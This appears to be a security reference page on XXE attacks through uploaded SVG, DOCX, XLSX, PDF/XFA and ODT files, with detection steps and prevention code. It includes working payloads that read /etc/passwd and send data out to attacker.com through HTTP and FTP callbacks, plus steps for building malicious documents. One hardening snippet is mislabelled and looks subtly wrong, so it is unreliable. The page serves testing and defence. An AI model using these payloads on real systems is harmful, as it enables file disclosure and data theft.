High

DTD Upload via File Input

Q: What file formats are vulnerable to XXE via file upload?

Any file format based on XML is potentially vulnerable: SVG (Scalable Vector Graphics), DOCX/XLSX/PPTX (OOXML — ZIP archives containing XML files), ODT/ODS (LibreOffice OpenDocument — also ZIP+XML), PDF with XFA forms (Adobe's XML-based form format), EPUB, and SAML assertions. The attack requires the application to process the uploaded file with an XML parser that has not disabled external entity resolution.

Q: How does DOCX/XLSX XXE work with Apache POI?

OOXML formats (DOCX, XLSX, PPTX) are ZIP archives containing XML files. The main document content is in word/document.xml (DOCX) or xl/worksheets/sheet1.xml (XLSX). Apache POI processes these XML files with a SAX or DOM parser. If that parser has entity resolution enabled, injecting and declarations into any of the XML files inside the ZIP triggers XXE when the file is processed server-side. CVE-2025-21425 targets the customXml/item1.xml component specifically.

Q: What is the CVE-2025-21425 DOCX customXml chain?

Microsoft Office 2024+ hardened the word/document.xml parser but left customXml/*.xml files unprotected. CVE-2025-21425 (CVSS 7.5, January 2025 Patch Tuesday) exploits this: a malicious DOCX contains an XXE payload in customXml/item1.xml rather than word/document.xml. The Office parser processes customXml files with the old unprotected parser. When the victim opens the DOCX, the customXml XML triggers file disclosure (local DTD reuse pattern). No macro required.

Q: What is CVE-2025-66516 Apache Tika PDF/XFA?

Apache Tika (< 3.2.2) processes PDF documents that embed XFA (XML Forms Architecture) forms. XFA is XML inside PDF. When Tika encounters an XFA section, it parses it with an XML parser that had external entity resolution enabled by default. A malicious PDF with an XFA form containing XXE payloads triggers arbitrary file read or SSRF when processed by any application using Tika for document ingestion. CVSS 10.0 — unauthenticated, network-reachable in many deployments.

Q: How do I craft a malicious DOCX for XXE testing?

1. Start with a clean DOCX file. 2. Unzip it: unzip clean.docx -d malicious/. 3. Edit word/document.xml (or malicious/customXml/item1.xml for CVE-2025-21425 chain): add and declarations, embed &xxe; in the document body. 4. Rezip: cd malicious && zip -r ../malicious.docx . && cd ... 5. Upload to the target application. The server processes the DOCX and resolves the external entity.

CWE-611A05:2021CVSS 7.57 min

XXE via file upload (CWE-611): external entity payloads inside SVG, DOCX, XLSX, or PDF processed server-side — file disclosure without modifying HTTP headers.

File formats: SVG, DOCX, XLSX, ODT, PDF/XFA — any XML-based format processed server-side
CVE-2025-66516 (Apache Tika PDF/XFA, CVSS 10.0) — new attack surface for AI document ingestion pipelines
CVE-2025-21425 (Office customXml chain, CVSS 7.5) — document.xml hardened but customXml/*.xml still vulnerable
Apache Batik SVG renderer, Apache POI OOXML processor, LibreOffice are primary targets
Tool: OXML_XXE generates malicious DOCX/XLSX/SVG/ODT files automatically

What is File Upload XXE?

File upload XXE exploits applications that accept XML-based file formats and process them server-side with an unprotected XML parser. The attacker's payload is embedded inside the file itself — in SVG markup, inside an OOXML ZIP archive, within a PDF's XFA form data, or in an ODT document XML. The HTTP upload request looks identical to a benign file upload; all attack logic is contained in the file content.

This is one of the most prevalent XXE patterns in modern applications because file upload endpoints exist in virtually every web application: avatar uploaders, document management systems, spreadsheet importers, invoice processors, resume parsers, and content management systems. Each of these features potentially processes XML-based file formats with vulnerable parsers.

OWASP A05:2021 (Security Misconfiguration) applies because the vulnerability is a parser configuration failure: Apache POI, Apache Batik, Apache Tika, and LibreOffice all ship with external entity resolution enabled unless explicitly configured otherwise. CVE-2025-66516 (Apache Tika, CVSS 10.0) is the most recent critical example, introducing a new attack surface for PDF/XFA processing in document ingestion pipelines including AI-powered RAG systems.

Mechanism

The attack sequence for DOCX upload:

The attacker starts with a valid DOCX file and unpacks it: unzip clean.docx -d malicious/.
They inject an XXE payload into word/document.xml (or customXml/item1.xml for CVE-2025-21425 chain).
They repack: cd malicious && zip -r ../malicious.docx . && cd ...
They upload malicious.docx to the target application.
The server processes the DOCX using Apache POI (or equivalent) — the XML parser encounters the DOCTYPE and resolves the entity.
File content or OOB callback confirms exploitation.

Attack Vectors by File Format

SVG — Apache Batik

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="500" height="100" xmlns="http://www.w3.org/2000/svg">
  <text x="10" y="50" font-size="14">&xxe;</text>
</svg>

If Apache Batik renders this SVG to PNG, the /etc/passwd contents appear as text in the rendered image. Extract by downloading the generated thumbnail and reading pixel data, or via OOB callback when the application serves the image.

<!-- OOB variant — no response reflection needed -->
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY % sp SYSTEM "http://attacker.com/exfil.dtd">
  %sp;
  %param1;
]>
<svg xmlns="http://www.w3.org/2000/svg"/>

DOCX/XLSX — Apache POI

# Step 1: Unpack
unzip clean.docx -d malicious/
 
# Step 2: Inject into word/document.xml

<!-- malicious/word/document.xml -->
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://YOUR-TOKEN.oast.pro/docx-xxe">
]>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas"
            xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body><w:p><w:r><w:t>&xxe;</w:t></w:r></w:p></w:body>
</w:document>

# Step 3: Repack
cd malicious && zip -r ../malicious.docx . && cd ..

For the CVE-2025-21425 chain (Office 2024+ hardened document.xml but not customXml):

<!-- malicious/customXml/item1.xml -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamsa 'wrapper'>
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
  %local_dtd; %eval; %error;
]>
<root/>

PDF/XFA — Apache Tika (CVE-2025-66516)

Apache Tika processes XFA (XML Forms Architecture) embedded in PDF files. Tika versions before 3.2.2:

# Create a PDF with embedded XFA containing XXE payload
# Using Python's reportlab + manual XFA injection
 
from reportlab.pdfgen import canvas
import struct
 
def create_xxe_pdf(output_path, oast_url):
    """Embed XXE payload in XFA form inside a valid PDF."""
    xfa_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "{oast_url}/tika-xfa-xxe">
  %xxe;
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><template><subform/></template></xdp:xdp>"""
    # Embed xfa_content in PDF XFA stream
    # [Tool: use tika-xxe-generator or manual PDF construction]

Check Tika version before exploitation: curl -s http://tika-server/version | jq .version.

ODT — LibreOffice (CVE-2025-31200)

<!-- malicious/content.xml inside malicious.odt ZIP -->
<?xml version="1.0" encoding="UTF-8"?>
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
                         xmlns:xi="http://www.w3.org/2001/XInclude">
  <office:body>
    <office:text>
      <!-- XInclude bypasses DOCTYPE filter in LibreOffice < 25.2.3 -->
      <xi:include parse="text" href="file:///etc/passwd"/>
    </office:text>
  </office:body>
</office:document-content>

Real-World Examples

CVE-2025-66516 — Apache Tika PDF/XFA (CVSS 10.0)

Apache Tika is embedded in enterprise search products, SharePoint integrations, AI RAG pipelines, and document management systems. Any application calling TikaInputStream.get(file) on attacker-uploaded PDFs before Tika 3.2.2 is vulnerable. The attack is especially impactful in automated document pipelines where PDFs are processed without human review.

CVE-2025-21425 — Microsoft Office OOXML Parser (CVSS 7.5)

Microsoft Office 2024 hardened word/document.xml against DOCTYPE-based XXE but left customXml/*.xml files processed by a separate unprotected code path. Patched in January 2025 Patch Tuesday. The attack requires no macros — opening the DOCX triggers automatic processing.

CVE-2025-31200 — LibreOffice ODT XInclude (CVSS 7.1)

LibreOffice blocked DOCTYPE-based XXE but did not disable XInclude processing. An ODT file with xi:include href="file:///etc/passwd" discloses the file when the document is opened or converted. Patched in LibreOffice 25.2.3 and 24.8.7.

HackerOne #1113539 — Rockstar Games XLSX Import (High)

The researcher modified a spreadsheet template to include XXE payloads in the OOXML XML files inside the ZIP. The server-side XLSX processor (Apache POI) resolved the entities and made OOB callbacks. This is representative of the most common file upload XXE vector: server-side document processing for import/export features.

Detection

Manual Testing

Identify file upload endpoints that process XML-based formats: avatar upload (SVG), document import (DOCX/XLSX), invoice processing (PDF), template upload (ODT).
Craft a benign test file and upload. Check that the endpoint accepts the format.
Inject an OOB XXE canary into the file's XML:
```
<!ENTITY % xxe SYSTEM "http://YOUR-TOKEN.oast.pro/file-upload-xxe">
```
Monitor Interactsh for callbacks after upload.

Use OXML_XXE to generate test files automatically:

# Install: gem install oxml_xxe
oxml_xxe -f docx -c http://YOUR-TOKEN.oast.pro/
# Generates malicious.docx with OOB XXE payload

For SVG: submit via every upload endpoint that accepts images, especially avatars and content thumbnails.

Automated Detection

OXML_XXE automates payload generation for DOCX, XLSX, PPTX, SVG, and ODT. Combined with an Interactsh token, it provides reliable OOB detection.

Nuclei templates cover CVE-specific file upload XXE (Tika CVE-2025-66516 template available in community templates).

BreachVex tests file-upload endpoints by generating malicious SVG, DOCX, and XLSX files with unique out-of-band callback tokens per content type, then watches for callbacks after each upload and correlates by token.

Prevention

Application Level

# Python — validate file contents before processing
import zipfile
import re
 
def validate_ooxml(file_bytes: bytes) -> None:
    """Scan OOXML ZIP for DOCTYPE/ENTITY declarations before processing."""
    with zipfile.ZipFile(file_bytes) as zf:
        for name in zf.namelist():
            if name.endswith('.xml') or name.endswith('.rels'):
                content = zf.read(name).decode('utf-8', errors='replace')
                if re.search(r'<!DOCTYPE|<!ENTITY', content, re.IGNORECASE):
                    raise ValueError(f"DOCTYPE/ENTITY detected in {name} — rejected")

Library Configuration

// Apache POI — use SAX event model with hardened parser
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
 
// For Apache Tika — upgrade to >= 3.2.2 (CVE-2025-66516 patched)
// Tika 3.2.2 disables entity resolution in XFA parser by default

<!-- Apache Batik — tika-config.xml to disable entity resolution -->
<properties>
  <parsers>
    <parser class="org.apache.tika.parser.xml.XMLParser">
      <params>
        <param name="parseXMLInSecurity" type="boolean">true</param>
      </params>
    </parser>
  </parsers>
</properties>

Rejecting files containing <!DOCTYPE patterns is not sufficient for LibreOffice ODT files. CVE-2025-31200 uses XInclude (xi:include) which does not use DOCTYPE. Scan for both <!DOCTYPE and xmlns:xi="http://www.w3.org/2001/XInclude" patterns, and disable XInclude at the parser level separately.

Resources

Frequently Asked Questions

What file formats are vulnerable to XXE via file upload?

Any file format based on XML is potentially vulnerable: SVG (Scalable Vector Graphics), DOCX/XLSX/PPTX (OOXML — ZIP archives containing XML files), ODT/ODS (LibreOffice OpenDocument — also ZIP+XML), PDF with XFA forms (Adobe's XML-based form format), EPUB, and SAML assertions. The attack requires the application to process the uploaded file with an XML parser that has not disabled external entity resolution.

How does DOCX/XLSX XXE work with Apache POI?

OOXML formats (DOCX, XLSX, PPTX) are ZIP archives containing XML files. The main document content is in word/document.xml (DOCX) or xl/worksheets/sheet1.xml (XLSX). Apache POI processes these XML files with a SAX or DOM parser. If that parser has entity resolution enabled, injecting <!DOCTYPE> and <!ENTITY> declarations into any of the XML files inside the ZIP triggers XXE when the file is processed server-side. CVE-2025-21425 targets the customXml/item1.xml component specifically.

Which SVG rendering libraries are vulnerable to XXE?

Apache Batik (versions < 1.14) renders SVG files server-side and processes external entities by default. Apache Batik is used in many Java enterprise applications for SVG-to-PNG/PDF conversion. ImageMagick's SVG handler (via Inkscape delegate) has historical XXE vulnerabilities. Any server-side SVG renderer that does not explicitly disable external entity processing is vulnerable. Modern LibreOffice Export-to-SVG functions also process SVG files with Batik.

What is the CVE-2025-21425 DOCX customXml chain?

Microsoft Office 2024+ hardened the word/document.xml parser but left customXml/*.xml files unprotected. CVE-2025-21425 (CVSS 7.5, January 2025 Patch Tuesday) exploits this: a malicious DOCX contains an XXE payload in customXml/item1.xml rather than word/document.xml. The Office parser processes customXml files with the old unprotected parser. When the victim opens the DOCX, the customXml XML triggers file disclosure (local DTD reuse pattern). No macro required.

What is CVE-2025-66516 Apache Tika PDF/XFA?

Apache Tika (< 3.2.2) processes PDF documents that embed XFA (XML Forms Architecture) forms. XFA is XML inside PDF. When Tika encounters an XFA section, it parses it with an XML parser that had external entity resolution enabled by default. A malicious PDF with an XFA form containing XXE payloads triggers arbitrary file read or SSRF when processed by any application using Tika for document ingestion. CVSS 10.0 — unauthenticated, network-reachable in many deployments.

How do I craft a malicious DOCX for XXE testing?

1. Start with a clean DOCX file. 2. Unzip it: unzip clean.docx -d malicious/. 3. Edit word/document.xml (or malicious/customXml/item1.xml for CVE-2025-21425 chain): add <!DOCTYPE> and <!ENTITY xxe SYSTEM 'http://CANARY.oast.pro/'> declarations, embed &xxe; in the document body. 4. Rezip: cd malicious && zip -r ../malicious.docx . && cd ... 5. Upload to the target application. The server processes the DOCX and resolves the external entity.

How does SVG XXE work via avatar upload?

Avatar upload endpoints often accept SVG files to support vector graphics profiles. If the server renders the SVG to PNG/JPEG (for display) or extracts metadata using a library like Apache Batik, the SVG XML is processed. An attacker uploads a malicious SVG: <?xml version='1.0' standalone='yes'?><!DOCTYPE svg [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><svg><text>&xxe;</text></svg>. Apache Batik resolves the entity and may include the file content in the rendered image output or error message.

Can LibreOffice ODT files contain XXE payloads?

Yes — CVE-2025-31200 (CVSS 7.1) demonstrates XInclude-based file disclosure in LibreOffice ODT files. ODT is an OpenDocument format based on ZIP+XML. LibreOffice rejected DOCTYPE-based XXE but processed XInclude instructions, allowing xi:include href='file:///etc/passwd' to be embedded in the document XML. File content is included when LibreOffice opens or converts the file. Patched in LibreOffice 25.2.3 and 24.8.7.

What tools create malicious Office files for XXE testing?

OXML_XXE (github.com/BuffaloWill/oxml_xxe) — dedicated tool for generating malicious DOCX, XLSX, PPTX, ODT, and SVG files with configurable XXE payloads. It handles the ZIP unpacking, XML injection, and repacking automatically. xxeftp generates FTP-based OOB payloads. For manual crafting: unzip + edit XML + rezip is sufficient. For PDF/XFA: specialized tools or Python's reportlab with XFA injection.

What is the FTP exfiltration technique for OOXML XXE?

When OOXML XXE targets Java-based document processors (Apache POI on Java), the FTP exfiltration technique works: the entity references ftp://attacker.com:2121/%file; where %file; expands to the target file content. Java's FTP client sends the file content as the FTP username in the USER command, which the xxeftp tool captures. This technique is more reliable than HTTP for Java-based document processors because it handles newlines better than URL parameters.

How do I test file upload endpoints for XXE without triggering alerts?

Use a low-noise approach: 1. Upload a valid SVG/DOCX with no XXE payload to confirm acceptance. 2. Add an internal entity canary (no external fetch): <!ENTITY test 'XXECANARY'>. 3. If the canary is reflected in any response (thumbnail URL, metadata API, processed output), entity expansion is confirmed. 4. Escalate to OOB: add a SYSTEM entity with an Interactsh token — this makes one outbound DNS/HTTP request. 5. Only attempt file read if OOB confirms the parser is vulnerable.

Related vulnerabilities

High

DTD Upload via File Input

CWE-611A05:2021CVSS 7.57 min

XXE via file upload (CWE-611): external entity payloads inside SVG, DOCX, XLSX, or PDF processed server-side — file disclosure without modifying HTTP headers.

File formats: SVG, DOCX, XLSX, ODT, PDF/XFA — any XML-based format processed server-side
CVE-2025-66516 (Apache Tika PDF/XFA, CVSS 10.0) — new attack surface for AI document ingestion pipelines
CVE-2025-21425 (Office customXml chain, CVSS 7.5) — document.xml hardened but customXml/*.xml still vulnerable
Apache Batik SVG renderer, Apache POI OOXML processor, LibreOffice are primary targets
Tool: OXML_XXE generates malicious DOCX/XLSX/SVG/ODT files automatically

What is File Upload XXE?

Mechanism

The attack sequence for DOCX upload:

The attacker starts with a valid DOCX file and unpacks it: unzip clean.docx -d malicious/.
They inject an XXE payload into word/document.xml (or customXml/item1.xml for CVE-2025-21425 chain).
They repack: cd malicious && zip -r ../malicious.docx . && cd ...
They upload malicious.docx to the target application.
The server processes the DOCX using Apache POI (or equivalent) — the XML parser encounters the DOCTYPE and resolves the entity.
File content or OOB callback confirms exploitation.

Attack Vectors by File Format

SVG — Apache Batik

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="500" height="100" xmlns="http://www.w3.org/2000/svg">
  <text x="10" y="50" font-size="14">&xxe;</text>
</svg>

<!-- OOB variant — no response reflection needed -->
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY % sp SYSTEM "http://attacker.com/exfil.dtd">
  %sp;
  %param1;
]>
<svg xmlns="http://www.w3.org/2000/svg"/>

DOCX/XLSX — Apache POI

# Step 1: Unpack
unzip clean.docx -d malicious/
 
# Step 2: Inject into word/document.xml

<!-- malicious/word/document.xml -->
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://YOUR-TOKEN.oast.pro/docx-xxe">
]>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas"
            xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:body><w:p><w:r><w:t>&xxe;</w:t></w:r></w:p></w:body>
</w:document>

# Step 3: Repack
cd malicious && zip -r ../malicious.docx . && cd ..

For the CVE-2025-21425 chain (Office 2024+ hardened document.xml but not customXml):

<!-- malicious/customXml/item1.xml -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamsa 'wrapper'>
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
  %local_dtd; %eval; %error;
]>
<root/>

PDF/XFA — Apache Tika (CVE-2025-66516)

Apache Tika processes XFA (XML Forms Architecture) embedded in PDF files. Tika versions before 3.2.2:

# Create a PDF with embedded XFA containing XXE payload
# Using Python's reportlab + manual XFA injection
 
from reportlab.pdfgen import canvas
import struct
 
def create_xxe_pdf(output_path, oast_url):
    """Embed XXE payload in XFA form inside a valid PDF."""
    xfa_content = f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "{oast_url}/tika-xfa-xxe">
  %xxe;
]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><template><subform/></template></xdp:xdp>"""
    # Embed xfa_content in PDF XFA stream
    # [Tool: use tika-xxe-generator or manual PDF construction]

Check Tika version before exploitation: curl -s http://tika-server/version | jq .version.

ODT — LibreOffice (CVE-2025-31200)

<!-- malicious/content.xml inside malicious.odt ZIP -->
<?xml version="1.0" encoding="UTF-8"?>
<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0"
                         xmlns:xi="http://www.w3.org/2001/XInclude">
  <office:body>
    <office:text>
      <!-- XInclude bypasses DOCTYPE filter in LibreOffice < 25.2.3 -->
      <xi:include parse="text" href="file:///etc/passwd"/>
    </office:text>
  </office:body>
</office:document-content>

Real-World Examples

CVE-2025-66516 — Apache Tika PDF/XFA (CVSS 10.0)

CVE-2025-21425 — Microsoft Office OOXML Parser (CVSS 7.5)

CVE-2025-31200 — LibreOffice ODT XInclude (CVSS 7.1)

HackerOne #1113539 — Rockstar Games XLSX Import (High)

Detection

Manual Testing

Identify file upload endpoints that process XML-based formats: avatar upload (SVG), document import (DOCX/XLSX), invoice processing (PDF), template upload (ODT).
Craft a benign test file and upload. Check that the endpoint accepts the format.
Inject an OOB XXE canary into the file's XML:
```
<!ENTITY % xxe SYSTEM "http://YOUR-TOKEN.oast.pro/file-upload-xxe">
```
Monitor Interactsh for callbacks after upload.

Use OXML_XXE to generate test files automatically:

# Install: gem install oxml_xxe
oxml_xxe -f docx -c http://YOUR-TOKEN.oast.pro/
# Generates malicious.docx with OOB XXE payload

For SVG: submit via every upload endpoint that accepts images, especially avatars and content thumbnails.

Automated Detection

OXML_XXE automates payload generation for DOCX, XLSX, PPTX, SVG, and ODT. Combined with an Interactsh token, it provides reliable OOB detection.

Nuclei templates cover CVE-specific file upload XXE (Tika CVE-2025-66516 template available in community templates).

Prevention

Application Level

# Python — validate file contents before processing
import zipfile
import re
 
def validate_ooxml(file_bytes: bytes) -> None:
    """Scan OOXML ZIP for DOCTYPE/ENTITY declarations before processing."""
    with zipfile.ZipFile(file_bytes) as zf:
        for name in zf.namelist():
            if name.endswith('.xml') or name.endswith('.rels'):
                content = zf.read(name).decode('utf-8', errors='replace')
                if re.search(r'<!DOCTYPE|<!ENTITY', content, re.IGNORECASE):
                    raise ValueError(f"DOCTYPE/ENTITY detected in {name} — rejected")

Library Configuration

// Apache POI — use SAX event model with hardened parser
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
 
// For Apache Tika — upgrade to >= 3.2.2 (CVE-2025-66516 patched)
// Tika 3.2.2 disables entity resolution in XFA parser by default

<!-- Apache Batik — tika-config.xml to disable entity resolution -->
<properties>
  <parsers>
    <parser class="org.apache.tika.parser.xml.XMLParser">
      <params>
        <param name="parseXMLInSecurity" type="boolean">true</param>
      </params>
    </parser>
  </parsers>
</properties>

Resources

Frequently Asked Questions

What file formats are vulnerable to XXE via file upload?

How does DOCX/XLSX XXE work with Apache POI?

Which SVG rendering libraries are vulnerable to XXE?

What is the CVE-2025-21425 DOCX customXml chain?

What is CVE-2025-66516 Apache Tika PDF/XFA?

How do I craft a malicious DOCX for XXE testing?

How does SVG XXE work via avatar upload?

Can LibreOffice ODT files contain XXE payloads?

What tools create malicious Office files for XXE testing?

What is the FTP exfiltration technique for OOXML XXE?

How do I test file upload endpoints for XXE without triggering alerts?

DTD Upload via File Input

What is File Upload XXE?#

Mechanism#

Attack Vectors by File Format#

SVG — Apache Batik#

DOCX/XLSX — Apache POI#

PDF/XFA — Apache Tika (CVE-2025-66516)#

ODT — LibreOffice (CVE-2025-31200)#

Real-World Examples#

Detection#

Manual Testing#

Automated Detection#

Prevention#

Application Level#

Library Configuration#

Resources#

Frequently Asked Questions

Related vulnerabilities

DTD Upload via File Input

What is File Upload XXE?#

Mechanism#

Attack Vectors by File Format#

SVG — Apache Batik#

DOCX/XLSX — Apache POI#

PDF/XFA — Apache Tika (CVE-2025-66516)#

ODT — LibreOffice (CVE-2025-31200)#

Real-World Examples#

Detection#

Manual Testing#

Automated Detection#

Prevention#

Application Level#

Library Configuration#

Resources#

Frequently Asked Questions

Related vulnerabilities

What is File Upload XXE?

Mechanism

Attack Vectors by File Format

SVG — Apache Batik

DOCX/XLSX — Apache POI

PDF/XFA — Apache Tika (CVE-2025-66516)

ODT — LibreOffice (CVE-2025-31200)

Real-World Examples

Detection

Manual Testing

Automated Detection

Prevention

Application Level

Library Configuration

Resources

What is File Upload XXE?

Mechanism

Attack Vectors by File Format

SVG — Apache Batik

DOCX/XLSX — Apache POI

PDF/XFA — Apache Tika (CVE-2025-66516)

ODT — LibreOffice (CVE-2025-31200)

Real-World Examples

Detection

Manual Testing

Automated Detection

Prevention

Application Level

Library Configuration

Resources